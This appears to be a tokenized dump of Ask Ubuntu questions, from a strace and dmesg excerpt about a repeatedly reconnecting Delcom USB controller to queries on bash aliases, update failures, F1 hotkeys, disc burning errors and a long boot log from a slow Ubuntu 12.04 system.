../../../devices/pci0000:00/0000 '' ... , 1024 ) = 45 stat ( `` /sys/devices/pci0000:00/0000:00:14.0/usb2/uevent '' , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 readlink ( `` /sys/bus/usb/devices/1-8.3:1.0 '' , `` ../../../devices/pci0000:00/0000 '' ... , 1024 ) = 65 stat ( `` /sys/devices/pci0000:00/0000:00:14.0/usb1/1-8/1-8.3/1-8.3:1.0/uevent '' , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 readlink ( `` /sys/bus/usb/devices/1-8.3:1.1 '' , `` ../../../devices/pci0000:00/0000 '' ... , 1024 ) = 65 stat ( `` /sys/devices/pci0000:00/0000:00:14.0/usb1/1-8/1-8.3/1-8.3:1.1/uevent '' , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 readlink ( `` /sys/bus/usb/devices/1-8.3:1.2 '' , `` ../../../devices/pci0000:00/0000 '' ... , 1024 ) = 65 stat ( `` /sys/devices/pci0000:00/0000:00:14.0/usb1/1-8/1-8.3/1-8.3:1.2/uevent '' , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 readlink ( `` /sys/bus/usb/devices/1-8.3:1.3 '' , `` ../../../devices/pci0000:00/0000 '' ... , 1024 ) = 65 stat ( `` /sys/devices/pci0000:00/0000:00:14.0/usb1/1-8/1-8.3/1-8.3:1.3/uevent '' , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 readlink ( `` /sys/bus/usb/devices/1-8.3 '' , `` ../../../devices/pci0000:00/0000 '' ... , 1024 ) = 55 stat ( `` /sys/devices/pci0000:00/0000:00:14.0/usb1/1-8/1-8.3/uevent '' , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 readlink ( `` /sys/bus/usb/devices/1-0:1.0 '' , `` ../../../devices/pci0000:00/0000 '' ... , 1024 ) = 53 stat ( `` /sys/devices/pci0000:00/0000:00:14.0/usb1/1-0:1.0/uevent '' , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 readlink ( `` /sys/bus/usb/devices/1-1:1.0 '' , `` ../../../devices/pci0000:00/0000 '' ... , 1024 ) = 57 stat ( `` /sys/devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1:1.0/uevent '' , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 readlink ( `` /sys/bus/usb/devices/1-8:1.0 '' , `` ../../../devices/pci0000:00/0000 '' ... , 1024 ) = 57 stat ( `` /sys/devices/pci0000:00/0000:00:14.0/usb1/1-8/1-8:1.0/uevent '' , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 readlink ( `` /sys/bus/usb/devices/1-12:1.0 '' , `` ../../../devices/pci0000:00/0000 '' ... , 1024 ) = 59 stat ( `` /sys/devices/pci0000:00/0000:00:14.0/usb1/1-12/1-12:1.0/uevent '' , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 readlink ( `` /sys/bus/usb/devices/1-12:1.1 '' , `` ../../../devices/pci0000:00/0000 '' ... , 1024 ) = 59 stat ( `` /sys/devices/pci0000:00/0000:00:14.0/usb1/1-12/1-12:1.1/uevent '' , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 readlink ( `` /sys/bus/usb/devices/1-12:1.2 '' , `` ../../../devices/pci0000:00/0000 '' ... , 1024 ) = 59 stat ( `` /sys/devices/pci0000:00/0000:00:14.0/usb1/1-12/1-12:1.2/uevent '' , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 readlink ( `` /sys/bus/usb/devices/2-0:1.0 '' , `` ../../../devices/pci0000:00/0000 '' ... , 1024 ) = 53 stat ( `` /sys/devices/pci0000:00/0000:00:14.0/usb2/2-0:1.0/uevent '' , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 readlink ( `` /sys/bus/usb/devices/2-4:1.0 '' , `` ../../../devices/pci0000:00/0000 '' ... , 1024 ) = 57 stat ( `` /sys/devices/pci0000:00/0000:00:14.0/usb2/2-4/2-4:1.0/uevent '' , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 getdents ( 7 , /* 0 entries */ , 32768 ) = 0 close ( 7 ) = 0 getdents ( 6 , /* 0 entries */ , 32768 ) = 0 close ( 6 ) = 0 openat ( at_fdcwd , `` /sys/class '' , o_rdonly|o_nonblock|o_directory|o_cloexec ) = 6 getdents ( 6 , /* 52 entries */ , 32768 ) = 1544 getdents ( 6 , /* 0 entries */ , 32768 ) = 0 close ( 6 ) = 0 readlink ( `` /sys/devices/pci0000:00/0000:00:14.0/usb1 '' , 0x7fff4e356820 , 1024 ) = -1 einval ( invalid argument ) stat ( `` /sys/devices/pci0000:00/0000:00:14.0/usb1/uevent '' , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 open ( `` /sys/devices/pci0000:00/0000:00:14.0/usb1/uevent '' , o_rdonly|o_cloexec ) = 6 fstat ( 6 , { st_mode=s_ifreg|0644 , st_size=4096 , ... } ) = 0 mmap ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7f18169ae000 read ( 6 , `` major=189\nminor=0\ndevname=bus/us '' ... , 4096 ) = 124 read ( 6 , `` '' , 4096 ) = 0 close ( 6 ) = 0 munmap ( 0x7f18169ae000 , 4096 ) = 0 open ( `` /sys/bus/usb/devices/usb1/busnum '' , o_rdonly ) = 6 fstat ( 6 , { st_mode=s_ifreg|0444 , st_size=4096 , ... } ) = 0 mmap ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7f18169ae000 read ( 6 , `` 1\n '' , 4096 ) = 2 close ( 6 ) = 0 munmap ( 0x7f18169ae000 , 4096 ) = 0 open ( `` /sys/bus/usb/devices/usb1/devnum '' , o_rdonly ) = 6 fstat ( 6 , { st_mode=s_ifreg|0444 , st_size=4096 , ... } ) = 0 mmap ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7f18169ae000 read ( 6 , `` 1\n '' , 4096 ) = 2 close ( 6 ) = 0 munmap ( 0x7f18169ae000 , 4096 ) = 0 open ( `` /sys/bus/usb/devices/usb1/speed '' , o_rdonly ) = 6 fstat ( 6 , { st_mode=s_ifreg|0444 , st_size=4096 , ... } ) = 0 mmap ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7f18169ae000 read ( 6 , `` 480\n '' , 4096 ) = 4 close ( 6 ) = 0 munmap ( 0x7f18169ae000 , 4096 ) = 0 open ( `` /sys/bus/usb/devices/usb1/descriptors '' , o_rdonly ) = 6 read ( 6 , dmesg ( this repeats many times ) [ 20697.307364 ] hid-generic 0003:0fc5 : b080.004f : usb_submit_urb ( ctrl ) failed : -1 [ 20697.307386 ] hid-generic 0003:0fc5 : b080.004f : timeout initializing reports [ 20697.307520 ] hid-generic 0003:0fc5 : b080.004f : hiddev0 , hidraw1 : usb hid v1.00 device [ delcom products inc. usb io controller ] on usb-0000:00:14.0-1/input0 [ 20697.307600 ] usb 1-1 : usb disconnect , device number 81 [ 20697.547520 ] usb 1-1 : new low-speed usb device number 82 using xhci_hcd [ 20697.569052 ] usb 1-1 : new usb device found , idvendor=0fc5 , idproduct=b080 [ 20697.569054 ] usb 1-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 20697.569055 ] usb 1-1 : product : usb io controller [ 20697.569056 ] usb 1-1 : manufacturer : delcom products inc. [ 20697.569140 ] usb 1-1 : ep 0x81 - rounding interval to 64 microframes , ep desc says 80 microframes [ 20707.577760 ] hid-generic 0003:0fc5 : b080.0050 : usb_submit_urb ( ctrl ) failed : -1 [ 20707.577783 ] hid-generic 0003:0fc5 : b080.0050 : timeout initializing reports [ 20707.577937 ] hid-generic 0003:0fc5 : b080.0050 : hiddev0 , hidraw1 : usb hid v1.00 device [ delcom products inc. usb io controller ] on usb-0000:00:14.0-1/input0 [ 20707.578030 ] usb 1-1 : usb disconnect , device number 82 [ 20707.817900 ] usb 1-1 : new low-speed usb device number 83 using xhci_hcd [ 20707.839504 ] usb 1-1 : new usb device found , idvendor=0fc5 , idproduct=b080 [ 20707.839508 ] usb 1-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 20707.839509 ] usb 1-1 : product : usb io controller [ 20707.839511 ] usb 1-1 : manufacturer : delcom products inc. [ 20707.839627 ] usb 1-1 : ep 0x81 - rounding interval to 64 microframes , ep desc says 80 microframes [ 20717.848097 ] hid-generic 0003:0fc5 : b080.0051 : usb_submit_urb ( ctrl ) failed : -1 [ 20717.848141 ] hid-generic 0003:0fc5 : b080.0051 : timeout initializing reports [ 20717.848533 ] hid-generic 0003:0fc5 : b080.0051 : hiddev0 , hidraw1 : usb hid v1.00 device [ delcom products inc. usb io controller ] on usb-0000:00:14.0-1/input0 [ 20717.848769 ] usb 1-1 : usb disconnect , device number 83 [ 20718.088255 ] usb 1-1 : new low-speed usb device number 84 using xhci_hcd [ 20718.110000 ] usb 1-1 : new usb device found , idvendor=0fc5 , idproduct=b080 [ 20718.110009 ] usb 1-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 20718.110014 ] usb 1-1 : product : usb io controller [ 20718.110018 ] usb 1-1 : manufacturer : delcom products inc. [ 20718.110325 ] usb 1-1 : ep 0x81 - rounding interval to 64 microframes , ep desc says 80 microframes
506995	how to easily make an alias command permanent	i search everywhere and almost everyone was suggesting to open the ~/.bashrc or ~/.bash_aliases , then put the alias command there , i created a function name palias as permanent alias function and put it in ~/.bashrc : function palias ( ) { echo `` alias $ 1= ' $ 2 ' '' > > /home/user/.bashrc ; } so now if i want to permanently alias some command i just : palias update `` sudo apt-get update '' i wonder if there is a built in command like this function , or anything like this to install from repositories ?
506996	update manager unable to detect internet	my ubuntu 12.04 update manager is unable to connect to the internet . i was able to download updates a month back with my older internet connection . now with my new internet connection , i am able to browse internet/download using firefox , but i 'm unable to download ubuntu updates . sudo apt-get update gives : err http : //extras.ubuntu.com precise release.gpg connection failed w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-updates/universe/i18n/translation-en connection failed e : some index files failed to download . they have been ignored , or old ones used instead .
506997	which command gets run when i press the f1 key ?	i want to add a new hotkey : when i press f1 it will do the same as shift+f1 does . i have added a new custom shortcut ( system - > keyboard ) but i do n't know the command to run like we press f1 . i appreciate your help .
506999	cant burn ubuntu disk here is error	braserolibburn scsi error condition on command 2ah write ( 10 ) : [ 5 21 02 ] invalid address braserolibburn something went wrong braserolibburn called brasero_job_error braserolibburn finished with an error braserolibburn asked to stop because of an error error = 15 message = `` an error occurred while writing to disc '' braserolibburn stopping session error : an error occurred while writing to disc ( brasero_burn_record brasero-burn.c:2862 )
507000	acpi error on boot , and extremely slow booting , ubuntu 12.04	my is system booting very very slow , the output from dmesg is shown below . from what i 've read online the numbers in the square brackets are time stamps , and it looks like mine takes ~224 ( i am tempted to say seconds here ) . there are two specific places where the time jumps , at [ 56.745640 ] and [ 102.158573 ] . just before the latter point at [ 101.460328 ] the apci error message output starts . what could be the problem and how could i fix it ? [ 1.475773 ] acpi : lid switch [ lid0 ] [ 1.475795 ] input : power button as /devices/lnxsystm:00/lnxpwrbn:00/input/input1 [ 1.475798 ] acpi : power button [ pwrf ] [ 1.479293 ] acpi : requesting acpi_cpufreq [ 1.561783 ] thermal lnxtherm:00 : registered as thermal_zone0 [ 1.561788 ] acpi : thermal zone [ tzs0 ] ( 39 c ) [ 1.591268 ] thermal lnxtherm:01 : registered as thermal_zone1 [ 1.591269 ] acpi : thermal zone [ tzs1 ] ( 30 c ) [ 1.591286 ] ghes : hest is not enabled ! [ 1.591329 ] isapnp : scanning for pnp cards ... [ 1.591353 ] serial : 8250/16550 driver , 32 ports , irq sharing enabled [ 1.610225 ] linux agpgart interface v0.103 [ 1.611392 ] brd : module loaded [ 1.611978 ] loop : module loaded [ 1.612278 ] libphy : fixed mdio bus : probed [ 1.612337 ] tun : universal tun/tap device driver , 1.6 [ 1.612338 ] tun : ( c ) 1999-2004 max krasnyansky < maxk @ qualcomm.com > [ 1.612369 ] ppp generic driver version 2.4.2 [ 1.612403 ] ehci_hcd : usb 2.0 'enhanced ' host controller ( ehci ) driver [ 1.612404 ] ehci-pci : ehci pci platform driver [ 1.612432 ] ehci-pci 0000:00:1a.0 : setting latency timer to 64 [ 1.612436 ] ehci-pci 0000:00:1a.0 : ehci host controller [ 1.612441 ] ehci-pci 0000:00:1a.0 : new usb bus registered , assigned bus number 1 [ 1.612454 ] ehci-pci 0000:00:1a.0 : debug port 2 [ 1.616362 ] ehci-pci 0000:00:1a.0 : cache line size of 64 is not supported [ 1.616377 ] ehci-pci 0000:00:1a.0 : irq 16 , io mem 0xc2619000 [ 1.625709 ] ehci-pci 0000:00:1a.0 : usb 2.0 started , ehci 1.00 [ 1.625726 ] usb usb1 : new usb device found , idvendor=1d6b , idproduct=0002 [ 1.625728 ] usb usb1 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.625730 ] usb usb1 : product : ehci host controller [ 1.625732 ] usb usb1 : manufacturer : linux 3.8.0-44-generic ehci_hcd [ 1.625733 ] usb usb1 : serialnumber : 0000:00:1a.0 [ 1.625829 ] hub 1-0:1.0 : usb hub found [ 1.625833 ] hub 1-0:1.0 : 2 ports detected [ 1.625942 ] ehci-pci 0000:00:1d.0 : setting latency timer to 64 [ 1.625946 ] ehci-pci 0000:00:1d.0 : ehci host controller [ 1.625950 ] ehci-pci 0000:00:1d.0 : new usb bus registered , assigned bus number 2 [ 1.625962 ] ehci-pci 0000:00:1d.0 : debug port 2 [ 1.629840 ] ehci-pci 0000:00:1d.0 : cache line size of 64 is not supported [ 1.629853 ] ehci-pci 0000:00:1d.0 : irq 23 , io mem 0xc2618000 [ 1.641706 ] ehci-pci 0000:00:1d.0 : usb 2.0 started , ehci 1.00 [ 1.641723 ] usb usb2 : new usb device found , idvendor=1d6b , idproduct=0002 [ 1.641725 ] usb usb2 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.641727 ] usb usb2 : product : ehci host controller [ 1.641729 ] usb usb2 : manufacturer : linux 3.8.0-44-generic ehci_hcd [ 1.641731 ] usb usb2 : serialnumber : 0000:00:1d.0 [ 1.641822 ] hub 2-0:1.0 : usb hub found [ 1.641825 ] hub 2-0:1.0 : 2 ports detected [ 1.641914 ] ehci-platform : ehci generic platform driver [ 1.641923 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 1.641934 ] uhci_hcd : usb universal host controller interface driver [ 1.641973 ] xhci_hcd 0000:00:14.0 : setting latency timer to 64 [ 1.641976 ] xhci_hcd 0000:00:14.0 : xhci host controller [ 1.641980 ] xhci_hcd 0000:00:14.0 : new usb bus registered , assigned bus number 3 [ 1.642069 ] xhci_hcd 0000:00:14.0 : cache line size of 64 is not supported [ 1.642112 ] xhci_hcd 0000:00:14.0 : irq 40 for msi/msi-x [ 1.642158 ] usb usb3 : new usb device found , idvendor=1d6b , idproduct=0002 [ 1.642160 ] usb usb3 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.642162 ] usb usb3 : product : xhci host controller [ 1.642164 ] usb usb3 : manufacturer : linux 3.8.0-44-generic xhci_hcd [ 1.642166 ] usb usb3 : serialnumber : 0000:00:14.0 [ 1.642225 ] xhci xhci_add_endpoint called for root hub [ 1.642227 ] xhci xhci_check_bandwidth called for root hub [ 1.642245 ] hub 3-0:1.0 : usb hub found [ 1.642252 ] hub 3-0:1.0 : 4 ports detected [ 1.642527 ] xhci_hcd 0000:00:14.0 : xhci host controller [ 1.642530 ] xhci_hcd 0000:00:14.0 : new usb bus registered , assigned bus number 4 [ 1.642556 ] usb usb4 : new usb device found , idvendor=1d6b , idproduct=0003 [ 1.642558 ] usb usb4 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.642560 ] usb usb4 : product : xhci host controller [ 1.642562 ] usb usb4 : manufacturer : linux 3.8.0-44-generic xhci_hcd [ 1.642564 ] usb usb4 : serialnumber : 0000:00:14.0 [ 1.642621 ] xhci xhci_add_endpoint called for root hub [ 1.642623 ] xhci xhci_check_bandwidth called for root hub [ 1.642640 ] hub 4-0:1.0 : usb hub found [ 1.642647 ] hub 4-0:1.0 : 4 ports detected [ 1.937546 ] usb 1-1 : new high-speed usb device number 2 using ehci-pci [ 1.945057 ] isapnp : no plug & play device found [ 1.949625 ] i8042 : pnp : ps/2 controller [ pnp0303 : kbd0 , pnp0f13 : ps2m ] at 0x60,0x64 irq 1,12 [ 1.977874 ] acpi : ec : gpe storm detected ( 9 gpes ) , transactions will use polling mode [ 1.985962 ] serio : i8042 kbd port at 0x60,0x64 irq 1 [ 1.985966 ] serio : i8042 aux port at 0x60,0x64 irq 12 [ 1.986025 ] mousedev : ps/2 mouse device common for all mice [ 1.987164 ] rtc_cmos 00:05 : rtc can wake from s4 [ 1.987268 ] rtc_cmos 00:05 : rtc core : registered rtc_cmos as rtc0 [ 1.987294 ] rtc0 : alarms up to one month , 242 bytes nvram , hpet irqs [ 1.987348 ] device-mapper : uevent : version 1.0.3 [ 1.987386 ] device-mapper : ioctl : 4.23.1-ioctl ( 2012-12-18 ) initialised : dm-devel @ redhat.com [ 1.987396 ] eisa : probing bus 0 at eisa.0 [ 1.987397 ] eisa : can not allocate resource for mainboard [ 1.987398 ] can not allocate resource for eisa slot 1 [ 1.987399 ] can not allocate resource for eisa slot 2 [ 1.987400 ] can not allocate resource for eisa slot 3 [ 1.987401 ] can not allocate resource for eisa slot 4 [ 1.987401 ] can not allocate resource for eisa slot 5 [ 1.987402 ] can not allocate resource for eisa slot 6 [ 1.987403 ] can not allocate resource for eisa slot 7 [ 1.987404 ] can not allocate resource for eisa slot 8 [ 1.987405 ] eisa : detected 0 cards . [ 1.987410 ] cpufreq-nforce2 : no nforce2 chipset . [ 1.987503 ] cpuidle : using governor ladder [ 1.987635 ] cpuidle : using governor menu [ 1.987638 ] ledtrig-cpu : registered to indicate activity on cpus [ 1.987639 ] efi variables facility v0.08 2004-may-17 [ 1.987749 ] ashmem : initialized [ 1.987837 ] tcp : cubic registered [ 1.987889 ] net : registered protocol family 10 [ 1.988004 ] net : registered protocol family 17 [ 1.988009 ] key type dns_resolver registered [ 1.988157 ] using ipi no-shortcut mode [ 1.988217 ] loading module verification certificates [ 1.990868 ] modsign : loaded cert 'magrathea : glacier signing key : 2efbf4ad9582ee6e0ed6b7f07aeecd58f97a9eb0' [ 1.990875 ] registered taskstats version 1 [ 1.992556 ] key type trusted registered [ 1.994024 ] key type encrypted registered [ 1.996503 ] rtc_cmos 00:05 : setting system clock to 2014-08-05 07:06:08 utc ( 1407222368 ) [ 1.997534 ] bios edd facility v0.16 2004-jun-25 , 0 devices found [ 1.997536 ] edd information not available . [ 2.012843 ] input : at translated set 2 keyboard as /devices/platform/i8042/serio0/input/input2 [ 2.069854 ] usb 1-1 : new usb device found , idvendor=8087 , idproduct=0024 [ 2.069861 ] usb 1-1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 2.070269 ] hub 1-1:1.0 : usb hub found [ 2.070474 ] hub 1-1:1.0 : 6 ports detected [ 2.181425 ] usb 2-1 : new high-speed usb device number 2 using ehci-pci [ 2.313727 ] usb 2-1 : new usb device found , idvendor=8087 , idproduct=0024 [ 2.313734 ] usb 2-1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 2.314018 ] hub 2-1:1.0 : usb hub found [ 2.314083 ] hub 2-1:1.0 : 8 ports detected [ 2.385462 ] usb 1-1.1 : new full-speed usb device number 3 using ehci-pci [ 2.437292 ] tsc : refined tsc clocksource calibration : 2294.786 mhz [ 2.437299 ] switching to clocksource tsc [ 2.478510 ] usb 1-1.1 : new usb device found , idvendor=138a , idproduct=0018 [ 2.478516 ] usb 1-1.1 : new usb device strings : mfr=0 , product=0 , serialnumber=1 [ 2.478520 ] usb 1-1.1 : serialnumber : b2486d36b11a [ 2.549347 ] usb 1-1.3 : new high-speed usb device number 4 using ehci-pci [ 2.724508 ] usb 1-1.3 : new usb device found , idvendor=04f2 , idproduct=b2f8 [ 2.724514 ] usb 1-1.3 : new usb device strings : mfr=3 , product=1 , serialnumber=2 [ 2.724518 ] usb 1-1.3 : product : hp truevision hd [ 2.724522 ] usb 1-1.3 : manufacturer : chicony electronics co. , ltd . [ 2.724525 ] usb 1-1.3 : serialnumber : 0x0001 [ 3.017092 ] acpi : battery slot [ bat0 ] ( battery present ) [ 3.017340 ] freeing unused kernel memory : 800k freed [ 3.017487 ] write protecting the kernel text : 6376k [ 3.017578 ] write protecting the kernel read-only data : 2556k [ 3.017579 ] nx-protecting the kernel data : 5912k [ 3.029062 ] udevd [ 133 ] : starting version 175 [ 3.075030 ] rtsx_pci 0000:02:00.0 : irq 41 for msi/msi-x [ 3.075068 ] rtsx_pci 0000:02:00.0 : rtsx_pci_acquire_irq : pcr- > msi_en = 1 , pci- > irq = 41 [ 3.076431 ] r8169 gigabit ethernet driver 2.3lk-napi loaded [ 3.076658 ] r8169 0000:05:00.0 : irq 42 for msi/msi-x [ 3.076825 ] r8169 0000:05:00.0 eth0 : rtl8168evl/8111evl at 0xf8450000 , 08:2e:5f:72 : c4:72 , xid 0c900800 irq 42 [ 3.076827 ] r8169 0000:05:00.0 eth0 : jumbo features [ frames : 9200 bytes , tx checksumming : ko ] [ 3.082639 ] ahci 0000:00:1f.2 : version 3.0 [ 3.082682 ] ahci 0000:00:1f.2 : irq 43 for msi/msi-x [ 3.096967 ] ahci 0000:00:1f.2 : ahci 0001.0300 32 slots 6 ports 6 gbps 0x11 impl raid mode [ 3.096974 ] ahci 0000:00:1f.2 : flags : 64bit ncq pm led clo pio slum part ems apst [ 3.096982 ] ahci 0000:00:1f.2 : setting latency timer to 64 [ 3.105282 ] scsi0 : ahci [ 3.105415 ] scsi1 : ahci [ 3.105603 ] scsi2 : ahci [ 3.105829 ] scsi3 : ahci [ 3.105970 ] scsi4 : ahci [ 3.106085 ] scsi5 : ahci [ 3.106131 ] ata1 : sata max udma/133 abar m2048 @ 0xc2617000 port 0xc2617100 irq 43 [ 3.106133 ] ata2 : dummy [ 3.106134 ] ata3 : dummy [ 3.106134 ] ata4 : dummy [ 3.106137 ] ata5 : sata max udma/133 abar m2048 @ 0xc2617000 port 0xc2617300 irq 43 [ 3.106138 ] ata6 : dummy [ 3.424803 ] ata5 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 3.428189 ] ata5.00 : atapi : hp dvdram gt50n , mp00 , max udma/100 [ 3.431195 ] ata5.00 : configured for udma/100 [ 3.432798 ] ata1 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 3.434250 ] ata1.00 : ata-8 : hitachi hts547575a9e384 , je4oa50a , max udma/100 [ 3.434257 ] ata1.00 : 1465149168 sectors , multi 16 : lba48 ncq ( depth 31/32 ) , aa [ 3.456594 ] ata1.00 : configured for udma/100 [ 3.456833 ] scsi 0:0:0:0 : direct-access ata hitachi hts54757 je4o pq : 0 ansi : 5 [ 3.456957 ] sd 0:0:0:0 : [ sda ] 1465149168 512-byte logical blocks : ( 750 gb/698 gib ) [ 3.456960 ] sd 0:0:0:0 : [ sda ] 4096-byte physical blocks [ 3.456993 ] sd 0:0:0:0 : attached scsi generic sg0 type 0 [ 3.457018 ] sd 0:0:0:0 : [ sda ] write protect is off [ 3.457019 ] sd 0:0:0:0 : [ sda ] mode sense : 00 3a 00 00 [ 3.457030 ] sd 0:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 3.459181 ] scsi 4:0:0:0 : cd-rom hp dvdram gt50n mp00 pq : 0 ansi : 5 [ 3.464416 ] sr0 : scsi3-mmc drive : 24x/24x writer dvd-ram cd/rw xa/form2 cdda tray [ 3.464422 ] cdrom : uniform cd-rom driver revision : 3.20 [ 3.464566 ] sr 4:0:0:0 : attached scsi cd-rom sr0 [ 3.464630 ] sr 4:0:0:0 : attached scsi generic sg1 type 5 [ 3.529191 ] sda : sda1 sda2 sda3 < sda5 sda6 sda7 > [ 3.529926 ] sd 0:0:0:0 : [ sda ] attached scsi disk [ 4.098108 ] ext4-fs ( sda7 ) : info : recovery required on readonly filesystem [ 4.098111 ] ext4-fs ( sda7 ) : write access will be enabled during recovery [ 6.977017 ] ext4-fs ( sda7 ) : orphan cleanup on readonly fs [ 6.977023 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 22020531 [ 6.977072 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 22021916 [ 6.977089 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 22020419 [ 6.977104 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 18886604 [ 6.977123 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 18886576 [ 6.994675 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3280929 [ 6.994684 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3276816 [ 6.994688 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3276811 [ 6.994692 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3276809 [ 6.994695 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3276807 [ 6.994699 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3276806 [ 6.994702 ] ext4-fs ( sda7 ) : ext4_orphan_cleanup : deleting unreferenced inode 3276805 [ 6.994706 ] ext4-fs ( sda7 ) : 12 orphan inodes deleted [ 6.994707 ] ext4-fs ( sda7 ) : recovery complete [ 7.209279 ] ext4-fs ( sda7 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 8.778230 ] init : ureadahead main process ( 297 ) terminated with status 5 [ 10.209501 ] adding 3905532k swap on /dev/sda6 . priority : -1 extents:1 across:3905532k [ 12.023616 ] ext4-fs ( sda7 ) : re-mounted . opts : errors=remount-ro [ 13.182895 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 13.333154 ] ext4-fs ( sda5 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 13.511109 ] udevd [ 607 ] : starting version 175 [ 14.436742 ] rpc : registered named unix socket transport module . [ 14.436744 ] rpc : registered udp transport module . [ 14.436745 ] rpc : registered tcp transport module . [ 14.436746 ] rpc : registered tcp nfsv4.1 backchannel transport module . [ 14.708765 ] lp : driver loaded but no devices found [ 14.928038 ] fs-cache : loaded [ 15.228908 ] fs-cache : netfs 'nfs ' registered for caching [ 15.888952 ] installing knfsd ( copyright ( c ) 1996 okir @ monad.swb.de ) . [ 17.588294 ] ppdev : user-space parallel port driver [ 18.713896 ] mei 0000:00:16.0 : setting latency timer to 64 [ 18.713945 ] mei 0000:00:16.0 : irq 44 for msi/msi-x [ 18.723583 ] acpi warning : 0x00000428-0x0000042f systemio conflicts with region \pmio 1 ( 20121018/utaddress-251 ) [ 18.723587 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 18.723591 ] acpi warning : 0x00000530-0x0000053f systemio conflicts with region \gpio 1 ( 20121018/utaddress-251 ) [ 18.723593 ] acpi warning : 0x00000530-0x0000053f systemio conflicts with region \_sb_.gpio 2 ( 20121018/utaddress-251 ) [ 18.723595 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 18.723596 ] acpi warning : 0x00000500-0x0000052f systemio conflicts with region \gpio 1 ( 20121018/utaddress-251 ) [ 18.723598 ] acpi warning : 0x00000500-0x0000052f systemio conflicts with region \_sb_.gpio 2 ( 20121018/utaddress-251 ) [ 18.723600 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 18.723601 ] lpc_ich : resource conflict ( s ) found affecting gpio_ich [ 18.800192 ] wmi : mapper loaded [ 18.841069 ] hp_accel : hardware type dv7 found [ 18.873401 ] microcode : cpu0 sig=0x306a9 , pf=0x10 , revision=0x10 [ 18.988863 ] lis3lv02d : 8 bits 3dc sensor found [ 19.118877 ] microcode : cpu1 sig=0x306a9 , pf=0x10 , revision=0x10 [ 19.119770 ] microcode : cpu2 sig=0x306a9 , pf=0x10 , revision=0x10 [ 19.120579 ] microcode : cpu3 sig=0x306a9 , pf=0x10 , revision=0x10 [ 19.121396 ] microcode : cpu4 sig=0x306a9 , pf=0x10 , revision=0x10 [ 19.122211 ] microcode : cpu5 sig=0x306a9 , pf=0x10 , revision=0x10 [ 19.122997 ] microcode : cpu6 sig=0x306a9 , pf=0x10 , revision=0x10 [ 19.123766 ] microcode : cpu7 sig=0x306a9 , pf=0x10 , revision=0x10 [ 19.124558 ] microcode : microcode update driver : v2.00 < tigran @ aivazian.fsnet.co.uk > , peter oruba [ 19.184764 ] input : st lis3lv02dl accelerometer as /devices/platform/lis3lv02d/input/input3 [ 19.209674 ] [ drm ] initialized drm 1.1.0 20060810 [ 19.225073 ] bluetooth : core ver 2.16 [ 19.225091 ] net : registered protocol family 31 [ 19.225092 ] bluetooth : hci device and connection manager initialized [ 19.225097 ] bluetooth : hci socket layer initialized [ 19.225099 ] bluetooth : l2cap socket layer initialized [ 19.225102 ] bluetooth : sco socket layer initialized [ 19.225143 ] cfg80211 : calling crda to update world regulatory domain [ 19.349763 ] bluetooth : rfcomm tty layer initialized [ 19.349772 ] bluetooth : rfcomm socket layer initialized [ 19.349773 ] bluetooth : rfcomm ver 1.11 [ 19.473853 ] type=1400 audit ( 1407211585.984:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=983 comm= '' apparmor_parser '' [ 19.473860 ] type=1400 audit ( 1407211585.984:3 ) : 